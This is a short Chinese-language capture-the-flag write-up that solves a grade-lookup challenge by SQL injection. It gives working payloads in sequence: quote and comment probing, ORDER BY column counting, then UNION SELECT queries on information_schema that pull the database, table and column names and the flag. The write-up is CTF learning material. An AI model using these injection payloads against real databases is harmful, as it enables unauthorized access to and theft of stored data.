题目描述:
快来查查成绩吧
http://120.24.86.145:8002/chengjidan/
1.快来查查成绩吧!
输入1,2,3分别能查到1,2,3号学生的成绩
SQL注入应该没跑了
输入1'返回异常,输入1'--+返回异常,输入1' #返回正常,看来过滤了--+
观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列
接下来就开始暴库名、表名、字段名
2. (1) 0' union select 1,2,database(),4 #
得到数据库名:skctf_flag
(2) 0' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='skctf_flag'#
得到表表名:fl4g 与 sc,flag应该在fl4g里
(3) 0' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='fl4g'#
得到字段名:skctf_flag
(4) 0' union select 1,2,skctf_flag,4 from fl4g#
得到flag